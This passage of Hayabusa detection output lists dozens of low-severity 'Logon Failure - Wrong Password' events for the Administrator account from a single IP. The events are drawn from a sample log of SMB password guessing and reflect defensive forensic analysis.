NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: okunzcEHnxUml4SG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qH0AY3DeIryuHSiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DjqtxY5Fly4qAusS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PXHYu7wAqo7m6mZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaEM3boErBRrCbna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nSzwstH2imPjwah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6NM0I4vRTXlLKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jYhjN3f8KlFIEUKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qWicYt2HXLDgc3kc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uz7yqqxdMrsM2L1g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqKTguT2Z3OPCxGR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ywpwCM4u6nFSq9oS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1t5ZBw3HOxux65e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtLFQSltjjOjdl2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AyFD3cjef0NUMZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDYECnF1YTKRKA3K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfqxcIVpX9BbsPIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjL5hvyYesMfDISw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3bh8c5ohv55SAX26 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MflfcFDnGU3xUOmz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aX0wfTs5FzCdwGrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gdU6faDjEH5wW2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 507PC8xD6l0TbhG3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrWgYcf9EuXt4MHS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvIGEw3fdX9cDzIV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9X1q0dT5irWa44Rz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpgAkElSQjVo53z2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nxUEwRMaiAhiIXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIoaysmFNfEerv8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aHLhFgL0xfnrAIoF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YGK96B1hDPMK9YKh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhDnNRDnAwctVtgQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zzO7RKaBPpg549A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDgDGO3IKiLoIQ5D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aaYeBTUEudC3446 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I41H8U06uuGlMf9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6Eh55149gbuU2el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajzJabQi7CjosFQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l9y7gyU9aJi6Fpm3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hbLiIVcBYlu5JkX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDfEfHk54J3lJI6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WOpuMTECalyeObl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nZQYU1dyQOqlNJDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pc58gDT07WNH3mMz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhExnDfInKbEI6AO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKKTTQ0ZT2Ye4TV9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LdBFYyftnH67Gyh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eO6c2PDl7zVBGzPi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ONnDOs16EnBkdFv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTHHCX9EoKRY4zhR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f1jhH08oLzpONDpa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o2YK7zc7Ne9c8txA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86CrOo9CFreIzSM5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0X9UEojEnc350xPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9g3PO3jofnySl92G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TRndfQmPYuhV0Ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yyJOdaks4B1sKMDv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IB3OSmcFx5TUiiJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lo3Ex40dkIeO53HF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkzDG8QOM2cxbokF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YoMf36ZXJBLnYxtc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5izPIefHqDDWNDlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z9o4f1XvvcVXBNwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IjCR48ZJFyEhzrYI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUV9i4O2gapcC01d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJzGAMQCvJBFOUPq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fyyu0x6I29R2J10Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8lCe1shqSs0xNwAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ipZAMvm56d5mE9Fc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XX9N7jodTuEYBCSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h5DBFGpzfJJ7gYV1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ3qTwcWkXJDuXDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOfkvLSo2HuhMtvk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y9DQUhPQHvvwAO0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yao1JM0tSFv5IHnL | IP Addr: 192.168.198.149 | AuthPackage: 